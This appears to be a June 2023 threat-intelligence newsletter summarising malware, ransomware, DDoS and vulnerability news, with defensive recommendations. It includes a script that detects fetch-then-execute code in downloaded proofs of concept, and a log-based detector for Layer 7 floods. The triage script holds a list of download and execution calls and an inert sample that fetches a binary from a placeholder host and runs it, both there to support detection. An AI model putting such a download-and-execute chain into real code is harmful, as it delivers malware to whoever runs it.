At a Glance
Ransomware, Malware & Phishing
- Fake Researcher Profiles Spread Malware through GitHub Repositories as PoC Exploits
- Microsoft Warns of New Russian State-Sponsored Hacker Group with Destructive Intent
- Over 100,000 ChatGPT accounts stolen via info-stealing malware
- Microsoft Blames Massive DDoS Attack for Azure, Outlook, and OneDrive Disruptions
- Reddit hackers threaten to leak data stolen in February breach
- Researchers Discover New Sophisticated Toolkit Targeting Apple macOS Systems
- Vidar Malware Using New Tactics to Evade Detection and Anonymize Activities
- LockBit Ransomware Extorts $91 Million from U.S. Companies
Vulnerabilities
- MOVEit Customers Urged to Patch Third Critical Vulnerability
- Malwarebytes issues fix for Chrome broken by Windows 11 KB5027231
- ASUS Patches Highly Critical WiFi Router Flaws
- Zyxel Releases Urgent Security Updates for Critical Vulnerability in NAS Devices
Ransomware, Malware & Phishing
Fake Researcher Profiles Spread Malware through GitHub Repositories as PoC Exploits
Analysis: A recent discovery has revealed the presence of a group of impostor researchers utilizing GitHub to distribute malicious repositories containing alleged proof-of-concept exploits for zero-day vulnerabilities.
The fraudulent cybersecurity company behind this scheme, known as High Sierra Cyber Security, created numerous fake GitHub accounts and Twitter profiles to lend credibility to their activities. In an attempt to appear legitimate, they even incorporated headshots of genuine security researchers from reputable organizations.
The repositories hosted on GitHub consist of Python scripts that, when executed, download and run malicious binaries on Windows and Linux systems. Notably, the targeted software includes Discord, Google Chrome, and Microsoft Exchange Server.
The fraudulent campaign was first identified in early May and, at present, the repositories remain accessible. Specific indicators of compromise associated with the attack have not been disclosed in the available information at this time. Consequently, users are advised to exercise caution when downloading code from open-source repositories. A thorough review of the code and validation of its authenticity are essential prior to execution. This incident serves as a stark reminder to remain vigilant regarding potential security risks when dealing with code obtained from untrusted sources.
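As an added illustration (not a tool from the report or from any party named in it), the following static check triages a downloaded Python "proof of concept" for the fetch-then-execute chain described above before anyone runs it. Both sample scripts are constructed and inert; the URL in the second one is a placeholder.

```python
# Added example (not a tool from the report): static triage of a downloaded
# Python "PoC" that flags the fetch-then-execute pattern described above.
import ast

# Call targets for each stage of a download-and-execute chain.
STAGES = {
    "fetch": {"urllib.request.urlopen", "urllib.request.urlretrieve",
              "requests.get", "requests.post"},
    "execute": {"subprocess.run", "subprocess.Popen", "subprocess.call",
                "subprocess.check_output", "os.system", "os.popen",
                "os.execv", "os.startfile", "exec", "eval"},
    "chmod": {"os.chmod"},
}


def dotted_name(node: ast.AST) -> str:
    """Render a call target such as ur.urlopen as a dotted string."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = dotted_name(node.value)
        return f"{base}.{node.attr}" if base else node.attr
    return ""


def triage_source(source: str) -> dict:
    """Map each stage to the (resolved call name, line) pairs that use it."""
    tree = ast.parse(source)
    aliases = {}  # local name -> fully qualified module path
    for node in ast.walk(tree):
        if isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
        elif isinstance(node, ast.Import):
            for a in node.names:
                if a.asname:
                    aliases[a.asname] = a.name
    hits = {stage: [] for stage in STAGES}
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = dotted_name(node.func)
        head, _, rest = name.partition(".")
        if head in aliases:  # e.g. ur.urlopen -> urllib.request.urlopen
            name = aliases[head] + (f".{rest}" if rest else "")
        for stage, targets in STAGES.items():
            if name in targets:
                hits[stage].append((name, node.lineno))
    return hits


def verdict(hits: dict) -> str:
    """The combination of fetch and execute, not any single call, is the indicator."""
    if hits["fetch"] and hits["execute"]:
        return "BLOCK: fetches a remote payload and executes it"
    if hits["fetch"] or hits["execute"]:
        return "REVIEW: network fetch or process execution present"
    return "PASS: no fetch/execute primitives found"


# Constructed samples; the URL is a placeholder and nothing here is executed.
BENIGN_POC = '''
import socket, struct
def probe(host, port):
    with socket.create_connection((host, port), timeout=3) as s:
        s.sendall(struct.pack("<I", 0x41414141))
        return s.recv(64)
'''
SUSPICIOUS_POC = '''
import urllib.request as ur
from subprocess import Popen
import os
def run():
    ur.urlretrieve("https://example.invalid/stage2.bin", "/tmp/stage2")
    os.chmod("/tmp/stage2", 0o755)
    Popen(["/tmp/stage2"])
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_POC), ("suspicious", SUSPICIOUS_POC)):
        hits = triage_source(src)
        print(f"{label}: {verdict(hits)}")
        for stage, found in hits.items():
            for name, line in found:
                print(f"  line {line}: {stage} via {name}")
```

The check resolves import aliases, so renaming `subprocess.Popen` via `from subprocess import Popen` or `import urllib.request as ur` does not hide the chain from it.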
In light of these findings, Access Point recommends implementing stringent security measures to safeguard against such threats. This includes conducting rigorous code reviews, utilizing trusted repositories whenever possible, and employing robust security solutions capable of detecting and mitigating malicious activities. Additionally, organizations should prioritize ongoing user education and awareness initiatives to ensure that employees are well-informed about the risks associated with downloading and executing code from unverified sources.
By adopting a proactive approach and adhering to these recommendations, individuals and businesses can fortify their defenses against potential cyber threats.
Microsoft Warns of New Russian State-Sponsored Hacker Group with Destructive Intent
Analysis: Microsoft has issued a warning about a newly identified Russian state-sponsored hacker group named Cadet Blizzard, believed to be linked to the General Staff Main Intelligence Directorate (GRU).
Although Cadet Blizzard has a lower success rate compared to other advanced Russian groups, it exhibits a distinct approach that poses a potential threat. The group has been active since at least 2020 and was first identified by Microsoft in January 2022.
Cadet Blizzard engages in disruptive, destructive, and information collection activities, often carried out in a haphazard manner. It has been seen targeting numerous sectors, including government agencies, law enforcement, non-profit organizations, IT service providers, and emergency services.
While primarily focused on entities in Ukraine, Europe, Central Asia, and periodically Latin America, Cadet Blizzard also targets NATO member states involved in providing military aid to Ukraine. The group has been associated with destructive attacks, espionage, and information operations. Notably, Cadet Blizzard exhibits lower operational security compared to more established Russian groups, operating during off-business hours to minimize detection and defacing Ukrainian organization websites. They are also associated with the hack-and-leak forum "Free Civilian."
Access Point advises organizations – especially governments and IT service providers involved in the Ukraine conflict – to be vigilant against the increasing risk posed by Cadet Blizzard. Implementing security controls such as regular patching and updates, network segmentation, and hardened credentials can help mitigate the risk of their attacks. Organizations should also stay informed about the latest threat intelligence, actively monitoring for any signs of Cadet Blizzard's activity. Although no specific indicators of compromise have been provided at this time, it is crucial for organizations to remain proactive by maintaining a threat intelligence team who are continuously working to stay updated on trending threats and news, while actively hunting within their network for any indicators of compromise that may have evaded detection by existing security systems.
Over 100,000 ChatGPT accounts stolen via info-stealing malware
Analysis: A recent investigation has revealed that over 100,000 user accounts on the ChatGPT platform have been compromised by information-stealing malware over the course of the past year.
Dark web marketplace data shows that May 2023 saw a peak in the theft of ChatGPT credential pairs. Cyber threat intelligence firm Group-IB discovered a significant number of info-stealer logs containing ChatGPT account credentials on underground websites. The highest number of compromised accounts was found in the Asia-Pacific region, closely followed by Europe.
The attackers employed several different techniques from the MITRE ATT&CK framework (a framework that catalogues the tactics and techniques used by attackers and how best to defend against them) to carry out their malicious activities. The techniques seen in this attack were: Initial Access, Data from Local System, Credential Dumping, Screen Capture, and Keylogging. Information stealers specifically targeted various applications, including web browsers and email clients, to extract sensitive account data.
This breach poses significant risks, as compromised ChatGPT accounts potentially grant access to proprietary information, internal strategies, and personal communications. Consequently, some companies, such as Samsung, have prohibited the use of ChatGPT on work computers due to security concerns.
To address this alarming situation, Access Point recommends several actions for ChatGPT users and organizations. Users should consider disabling the chat saving feature in the platform's settings or manually deleting conversations containing sensitive information. It is also crucial for organizations to proactively search the web for any potentially leaked credentials from this breach, especially if users have utilized their business credentials for their ChatGPT accounts. It is important to note that information-stealing malware can also capture screenshots or perform keylogging, potentially leading to further data leaks.
Organizations dealing with highly sensitive information should prioritize the use of locally built and self-hosted tools rather than relying solely on cloud-based services. Robust security measures should be implemented, including regular updates, antivirus software, and comprehensive employee training on recognizing and avoiding malware threats.
To enhance protection, constant monitoring of systems for indicators of compromise, maintaining backups, and establishing and testing an incident response plan are essential strategies to mitigate the impact of potential data breaches.
Microsoft Blames Massive DDoS Attack for Azure, Outlook, and OneDrive Disruptions
Analysis: Microsoft recently experienced significant disruptions to its Azure, Outlook, and OneDrive services, which the company attributes to a large-scale Distributed Denial of Service (DDoS) attack.
The attack was carried out by an unidentified threat actor group called Storm-1359. This group utilized various techniques, including the use of virtual private servers (VPS), rented cloud infrastructure, open proxies, and DDoS tools. Microsoft officially acknowledged Storm-1359's involvement in a recent post.
The attack primarily employed Layer 7 DDoS techniques, such as HTTP(S) floods, cache bypass attempts, and the Slowloris technique. Although no evidence of customer data compromise has been found, the service availability of the affected Microsoft platforms was temporarily impacted.
Storm-1359 is described as a disruptive and publicity-focused group, considered a "murky upstart." Although Anonymous Sudan claimed responsibility for the attacks, no direct link to Storm-1359 has been established.
This incident serves as a reminder that no organization is immune to the threat of cyberattacks. To mitigate DDoS attacks, organizations should implement robust network infrastructure and traffic analysis tools. Measures such as rate limiting, anomaly detection, and caching mechanisms can help minimize the impact of HTTP(S) flood attacks. Regular monitoring and analysis of network traffic are crucial for detecting and blocking DDoS attacks promptly. Collaborating with trusted security partners and sharing threat intelligence can also strengthen defense against threat actors like Storm-1359.
In conclusion, the recent DDoS attack on Microsoft's Azure, Outlook, and OneDrive services was attributed to the Storm-1359 threat actor group. While no evidence of data compromise has been found, the attack caused temporary service disruptions. Organizations must prioritize DDoS mitigation by implementing appropriate measures such as ensuring a robust network infrastructure, traffic analysis tools (e.g., Dynatrace), and mechanisms to counter HTTP(S) flood attacks. Regular monitoring, analysis, and collaboration with trusted security partners are essential for bolstering defense against such threats.
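As an added example (not Microsoft's detection logic), the following script runs two of the checks named above, a per-client request-rate limit and a cache-bypass heuristic, over constructed access-log lines; the client addresses, timestamps and thresholds are made up for illustration.

```python
# Added example (not Microsoft's detection logic): a first-pass anomaly check
# for the Layer 7 patterns named above, run over constructed access-log lines.
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Combined log format; the timestamp looks like 13/Jun/2023:09:15:01 +0000
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_line(line: str):
    """Split one log line into fields; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"], _, rec["query"] = rec["target"].partition("?")
    return rec


def peak_requests(times, window: timedelta) -> int:
    """Largest number of requests from one client inside any `window`."""
    recent, peak = deque(), 0
    for ts in sorted(times):
        recent.append(ts)
        while recent[0] < ts - window:
            recent.popleft()
        peak = max(peak, len(recent))
    return peak


def detect_l7_anomalies(lines, window=timedelta(seconds=10), rate_limit=50,
                        min_hits=10, bypass_ratio=0.8) -> dict:
    """Per client IP, list why its traffic looks like a Layer 7 flood: a rate a
    limiter would reject, or a cache-bypass pattern (same path, ever-changing
    query string so every request misses the cache and reaches the origin)."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            per_ip[rec["ip"]].append(rec)
    findings = {}
    for ip, recs in per_ip.items():
        reasons = []
        peak = peak_requests([r["ts"] for r in recs], window)
        if peak > rate_limit:
            reasons.append(f"{peak} requests in {int(window.total_seconds())}s")
        hits, queries = defaultdict(int), defaultdict(set)
        for r in recs:
            hits[r["path"]] += 1
            queries[r["path"]].add(r["query"])
        bypass = [p for p in hits
                  if hits[p] >= min_hits and len(queries[p]) / hits[p] >= bypass_ratio]
        if bypass:
            reasons.append("cache-bypass query strings on " + ", ".join(sorted(bypass)))
        if reasons:
            findings[ip] = reasons
    return findings


def make_sample_log() -> list:
    """Constructed traffic: one flooding client, one poller, one normal visitor."""
    base = datetime(2023, 6, 13, 9, 15, 0, tzinfo=timezone.utc)
    def line(ip, offset_s, target, ua="Mozilla/5.0"):
        ts = (base + timedelta(seconds=offset_s)).strftime("%d/%b/%Y:%H:%M:%S %z")
        return f'{ip} - - [{ts}] "GET {target} HTTP/1.1" 200 512 "-" "{ua}"'
    lines = []
    # 120 requests in 10 s, each with a fresh nonce so no cache can serve it
    lines += [line("203.0.113.7", i // 12, f"/api/search?q=nonce{i}", "python-requests/2.31")
              for i in range(120)]
    # A legitimate dashboard polling the same endpoint every 0.5 s for 10 s
    lines += [line("198.51.100.4", i // 2, "/api/status") for i in range(20)]
    # A normal visitor loading a page and its assets
    lines += [line("192.0.2.9", 0, "/"), line("192.0.2.9", 0, "/static/app.js?v=42"),
              line("192.0.2.9", 1, "/static/app.css?v=42"), line("192.0.2.9", 6, "/about")]
    return lines


if __name__ == "__main__":
    for ip, reasons in detect_l7_anomalies(make_sample_log()).items():
        print(ip, "->", "; ".join(reasons))
```

The polling client is deliberately not flagged: its rate stays under the limit and it reuses one cacheable URL, which is the behaviour a rate limiter and a cache are meant to keep serving.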
Reddit hackers threaten to leak data stolen in February breach
Analysis: The BlackCat (ALPHV) ransomware gang has claimed responsibility for a cyberattack on Reddit that occurred in February. During the attack, the gang successfully stole internal documents, source code, and employee data. The gang made ransom demands on April 13th and June 16th, attempting to extort Reddit for a payment.
The attack was initiated through a phishing attack on a Reddit employee. The BlackCat gang leveraged this entry point to gain access to Reddit's systems. In addition to the theft of internal documents, source code, and employee data, they also obtained limited information about the company's advertisers. To coerce Reddit into paying a ransom of $4.5 million, the gang threatened to leak the stolen data if their demands were not met.
The MITRE ATT&CK techniques associated with this attack include Phishing, Exploit Public-Facing Application, External Remote Services, Archive Collected Data, and Data from Local System. This suggests a multifaceted approach to the attack, employing various methods to infiltrate and exfiltrate data from Reddit's systems.
Access Point recommends that organizations take the following measures to mitigate the risks posed by such attacks:
- Prioritize employee education regarding the dangers of phishing attacks.
- Implement robust email security measures to detect and prevent phishing attempts.
- Employ multi-factor authentication (MFA) to enhance security and protect against unauthorized access.
- Regularly back up critical data and store backups in offline or off-site locations.
- Implement strong access controls and network segmentation to limit the impact of potential breaches.
Additionally, it is important for organizations to stay informed about emerging threats and collaborate with cybersecurity vendors and trusted sources to enhance their defense against ransomware attacks. By following these recommendations, organizations can strengthen their security posture and minimize the vulnerabilities associated with ransomware attacks.
For more information on security awareness training, check out the Access Point Resource Center.
Researchers Discover New Sophisticated Toolkit Targeting Apple macOS Systems
Analysis: Researchers from Bitdefender have discovered a new toolkit designed to target Apple macOS systems.
The malicious artifacts include JokerSpy, a Python-based backdoor, and a Swift-based FAT binary called xcc. The earliest sample of this toolkit dates back to April 18, 2023, and the discovery was recently announced in a preliminary report. The attack techniques identified by MITRE ATT&CK (the framework mentioned above) include Execution, Command and Scripting Interpreter, Exfiltration Over Alternative Protocol, and Data Encoding.
The JokerSpy backdoors are capable of targeting Windows, Linux, and macOS systems. They have functionalities such as gathering system information, executing commands, downloading and executing files, as well as establishing communication with remote servers. Additionally, another malicious artifact called "sh.py" possesses extensive capabilities for system metadata gathering, file enumeration, command execution, and data exfiltration. The xcc binary, although missing some files, is believed to be part of a more complex attack, indicating a larger campaign may be in progress.
To protect against these threats, Access Point recommends that organizations using Apple macOS ensure their systems are updated with the latest security patches. It is crucial to implement robust security measures like endpoint protection and monitoring to detect and mitigate potential threats.
Regularly educating users about social engineering and spear-phishing tactics is essential to enhance your overall security posture. Additionally, collaborating with trusted cybersecurity vendors and sharing threat intelligence can contribute to a proactive defense against sophisticated attacks targeting macOS systems.
Vidar Malware Using New Tactics to Evade Detection and Anonymize Activities
Analysis: The threat actors behind the Vidar malware have recently implemented new tactics to evade detection and anonymize their activities. These changes include modifying their backend infrastructure, rotating their IP addresses, and utilizing VPN servers to conceal their operations. The modifications to the backend infrastructure, including IP address updates and the adoption of VPN servers, were observed starting from March 2023.
The Vidar malware is a commercial information stealer that has been active since late 2018. It is distributed through various methods, including phishing campaigns, cracked software sites, rogue Google Ads, and the Bumblebee malware loader. The threat actors have taken steps to conceal their online trail by rotating their IP addresses and favoring providers in Moldova and Russia. They have also divided their infrastructure into two parts and implemented authentication measures for accessing files. Furthermore, the use of VPN servers has allowed them to hide their management activities and anonymize their operations. These recent changes indicate an effort to respond to public disclosures about their activities and make it more difficult for security teams to track their actions.
To protect against Vidar and similar threats, Access Point recommends that organizations remain vigilant against phishing campaigns and educate their employees about the risks associated with downloading cracked software and clicking on suspicious ads.
Deploying robust email filtering systems and implementing multi-factor authentication can help mitigate the risk of initial access through phishing attempts. It is also crucial to monitor and analyze network traffic regularly to detect and block connections to known malicious infrastructure. Staying informed about emerging threat intelligence and sharing indicators of compromise with trusted security partners can further enhance defense against threats like Vidar.
LockBit Ransomware Extorts $91 Million from U.S. Companies
Analysis: LockBit’s ransomware-as-a-service (RaaS) has successfully extorted $91 million from various U.S. organizations through hundreds of attacks since 2020. The attacks have been ongoing for an unspecified period.
Operating as a RaaS scheme, LockBit attracts affiliates to carry out ransomware attacks. Due to its decentralized nature, a wide range of attack methods and targets are employed by a large network of unconnected threat actors. LockBit has targeted critical infrastructure sectors, including finance, food and agriculture, education, energy, government, healthcare, manufacturing, and transportation.
LockBit has undergone three significant upgrades: LockBit Red in June 2021, LockBit Black in March 2022, and LockBit Green in January 2023. LockBit Green, based on leaked source code from the now-disbanded Conti gang, demonstrates the evolving nature of the ransomware strain.
Notably, LockBit has adapted to target Linux, VMware ESXi, and Apple macOS systems. The business model involves core developers renting out the ransomware to affiliates who carry out the actual deployment and extortion. Additionally, LockBit was the first to introduce a bug bounty program and incentivize individuals to get tattoos of its insignia.
To defend against LockBit ransomware attacks, Access Point recommends implementing robust cybersecurity measures. These include regular system patching, network segmentation, user awareness training, and strong access controls. Maintaining up-to-date backups and testing their effectiveness for swift recovery in the event of an attack is crucial.
It is also important to stay informed about emerging threat intelligence and collaborate with law enforcement agencies and cybersecurity experts to enhance defense against ransomware threats. Although no specific indicators of compromise are provided, organizations should prioritize staying updated on relevant vulnerabilities and applying necessary security patches to safeguard their systems.
In addition, it is recommended that organizations establish an incident response plan specifically tailored to ransomware incidents. This plan should include procedures for isolating infected systems, engaging law enforcement if necessary, and securely recovering from backups. Regular tabletop exercises and simulations can help validate the effectiveness of the incident response plan and ensure a swift and coordinated response in case of an attack.
Vulnerabilities
MOVEit Customers Urged to Patch Third Critical Vulnerability
Analysis: Progress Software has issued a warning to its MOVEit customers, urging them to apply patches for a third critical vulnerability in the file transfer software. Tracked as CVE-2023-35708, the vulnerability is an SQL injection flaw that could enable an attacker without authentication to escalate privileges and gain access to the MOVEit Transfer database. The bug affects several versions of MOVEit Transfer released before 2023.0.3 (15.0.3). Proof-of-concept code targeting the vulnerability was made public on June 15, prompting a swift response from Progress. This marks the third critical SQL injection flaw patched by Progress in its MOVEit products in the span of three weeks, following the disclosure of a zero-day vulnerability on May 31 and another critical bug patched a week later.
The first vulnerability, identified as CVE-2023-34362, began being exploited in late May, with evidence suggesting that attacks may have started two years ago. The recent campaign targeting the MOVEit zero-day has impacted over 100 organizations, including government entities, transportation departments, airlines, and educational institutions. The Cl0p ransomware gang has been attributed to the attacks and has publicly disclosed some of the victims. The second vulnerability, CVE-2023-35036, was disclosed on June 9 but has not been observed in active exploitation. While there is no evidence of CVE-2023-35708 being exploited, Progress emphasizes the importance of applying the latest patches promptly.
To safeguard the MOVEit Transfer environment, customers are advised to disable HTTP and HTTPS traffic, allowing only localhost access, before applying the available patches. Once the patches, including the June 15th patch that addresses the previous vulnerabilities, have been applied, customers can re-enable HTTP and HTTPS traffic. Progress has made DLL drop-in patches and full MOVEit Transfer installers available to resolve the vulnerabilities, and detailed instructions for applying the patches can be found in the company's advisory.
Access Point recommends that MOVEit Transfer customers apply the patches provided by Progress Software, including the June 15th patch that also resolves the previous security issues, following the sequence above: first disable HTTP and HTTPS traffic, allowing only localhost access for the duration of the patching process; then apply the patches; and only once they have been applied successfully, re-enable HTTP and HTTPS traffic to restore normal functionality. It is crucial for MOVEit Transfer customers to follow these steps promptly to enhance the security of their installations and mitigate the potential risks posed by the critical vulnerabilities.
Malwarebytes issues fix for Chrome broken by Windows 11 KB5027231
Analysis: Malwarebytes, a well-known anti-malware software vendor, has released a fix for a known issue that broke Google Chrome on its customers’ systems after installation of the Windows 11 22H2 update KB5027231. The issue caused the Google Chrome user interface to no longer display. It was traced to Malwarebytes’ anti-exploit module, which blocked the web browser from loading, or crashed it, after KB5027231 was installed.
Malwarebytes advised removing Chrome from the protected applications list in its product as a temporary workaround. The fix, shipped in component version 1.0.2047 and Malwarebytes version 4.5.31.270, allows Chrome to be added back to the protected applications list on all Windows 11 devices and remediates the user interface problem. The program updates automatically, but a manual check is possible by going to Settings > About > Check for updates. To re-enable Chrome as a protected application after the update has been applied, open Malwarebytes, select the “Settings” gear, click the “Security” tab, and select “Manage protected applications” under Exploit protection. From there, toggle on Google Chrome.
KB5027231 was also reported to affect systems protected by other antivirus solutions, such as Cisco and WatchGuard EDR products. Check your systems for updates whenever possible to catch broken software or vulnerabilities.
Access Point recommends that users of Malwarebytes update to the latest version through the instructions above and be sure to re-enable Chrome as a protected application if you have already applied the workaround. Applying this update will allow access to Chrome and let Malwarebytes protect the browser from any threats it is capable of stopping.
ASUS Patches Highly Critical WiFi Router Flaws
Analysis: ASUS, a well-known manufacturer of endpoint and networking hardware, has released urgent firmware updates along with a security advisory to address nine vulnerabilities across its Wi-Fi router product lines, and has warned users of potential remote code execution attacks.
The affected Wi-Fi routers related to the vulnerabilities are Asus GT6, GT-AXE16000, GT-AX11000 PRO, GT-AX6000, GT-AX11000, GS-AX5400, GS-AX3000, XT9, XT8, XT8 V2, RT-AX86U PRO, RT-AX86U, RT-AX86S, RT-AX82U, RT-AX58U, RT-AX3000, TUF-AX6000 and TUF-AX5400.
The vulnerabilities associated with these fixes are:
- CVE-2018-1160 (CVSS score: 9.8) - An older vulnerability from 2018 affecting Netatalk versions before 3.1.12. It is an out-of-bounds write that allowed a remote unauthenticated attacker to achieve arbitrary code execution.
- CVE-2022-26376 (CVSS score: 9.8) - A memory corruption vulnerability in ASUSWRT prior to version 3.0.0.4.386_48706 and ASUSWRT-Merlin New Gen prior to version 387.7. A specially crafted HTTP request causes the memory corruption, so an attacker must be able to send a network request to the device to trigger it.
- CVE-2022-35401 (CVSS score: 8.1) - An authentication bypass vulnerability that could permit an attacker to send malicious HTTP requests to gain full administrative access to the device.
- CVE-2022-38105 (CVSS score: 7.5) - An information disclosure vulnerability that could be exploited to access sensitive information by sending specially-crafted network packets.
- CVE-2022-38393 (CVSS score: 7.5) - A denial-of-service (DoS) vulnerability that could be triggered by sending a specially-crafted network packet.
- CVE-2022-46871 (CVSS score: 8.8) - The use of an out-of-date libusrsctp library that could open targeted devices to other attacks.
- CVE-2023-28702 (CVSS score: 8.8) - A command injection flaw that could be exploited by a local attacker to execute arbitrary system commands, disrupt the system, or terminate services.
- CVE-2023-28703 (CVSS score: 7.2) - A stack-based buffer overflow vulnerability that could be exploited by an attacker with admin privileges to execute arbitrary system commands, disrupt the system, or terminate services.
- CVE-2023-31195 (CVSS score: N/A) - An adversary-in-the-middle (AitM) flaw that could lead to a hijack of a user's session.
Installing new firmware is an arduous process which could potentially damage the hardware. For users who do not want to install the new firmware, ASUS recommends disabling services accessible from the WAN side, which includes remote access from WAN, port forwarding, DDNS, VPN server, DMZ, and port triggering. ASUS also advises periodically auditing both your equipment and your security procedures, which can help with detecting malware or discrepancies.
Access Point recommends that any users with the Wi-Fi routers covered by this firmware update should upgrade. Even though upgrading firmware can be daunting, with the possibility of failure, there are many critical remediations and fixes in this firmware release. ASUS provides an FAQ with step-by-step instructions on how to upgrade an ASUS router to the latest version. As always, keeping your programs and firmware up to date should be a top priority when it comes to ensuring a secure environment.
Zyxel Releases Urgent Security Updates for Critical Vulnerability in NAS Devices
Analysis: Zyxel, an IT networking solutions provider, has released security updates to address a critical security flaw in its network-attached storage (NAS) devices. Zyxel has warned that the associated vulnerability, CVE-2023-27992, could allow an attacker to execute arbitrary commands on affected systems.
The devices affected by this vulnerability and the affected versions are:
- NAS326 V5.21(AAZF.13)C0 and earlier
- NAS540 V5.21(AATB.10)C0 and earlier
- NAS542 V5.21(ABAG.10)C0 and earlier
CVE-2023-27992 (CVSS score: 9.8) is a pre-authentication command injection flaw that can allow an unauthenticated attacker to execute some operating system commands remotely by sending a specially crafted HTTP request.
With Zyxel devices becoming a commonplace attack vector, Access Point recommends upgrading these devices to the latest version to remediate CVE-2023-27992. Zyxel firewalls in particular have been under attack by threat actors, with multiple Zyxel products appearing on CISA’s Known Exploited Vulnerabilities catalog. Organizations should watch for firmware updates and upgrade their firmware whenever feasible to help mitigate risk to their network.
Sources
https://thehackernews.com/2023/06/fake-researcher-profiles-spread-malware.html
https://thehackernews.com/2023/06/microsoft-warns-of-new-russian-state.html
https://www.bleepingcomputer.com/news/security/infostealer-malware-have-stolen-101-000-chatgpt-accounts/
https://thehackernews.com/2023/06/microsoft-blames-massive-ddos-attack.html
https://thehackernews.com/2023/06/researchers-discover-new-sophisticated.html
https://www.bleepingcomputer.com/news/security/reddit-hackers-threaten-to-leak-data-stolen-in-february-breach/
https://thehackernews.com/2023/06/vidar-malware-using-new-tactics-to.html
https://thehackernews.com/2023/06/lockbit-ransomware-extorts-91-million.html
https://www.securityweek.com/moveit-customers-urged-to-patch-third-critical-vulnerability/
https://www.bleepingcomputer.com/news/microsoft/malwarebytes-issues-fix-for-chrome-broken-by-windows-11-kb5027231/
https://www.securityweek.com/asus-patches-highly-critical-wifi-router-flaws/
https://thehackernews.com/2023/06/zyxel-releases-urgent-security-updates.html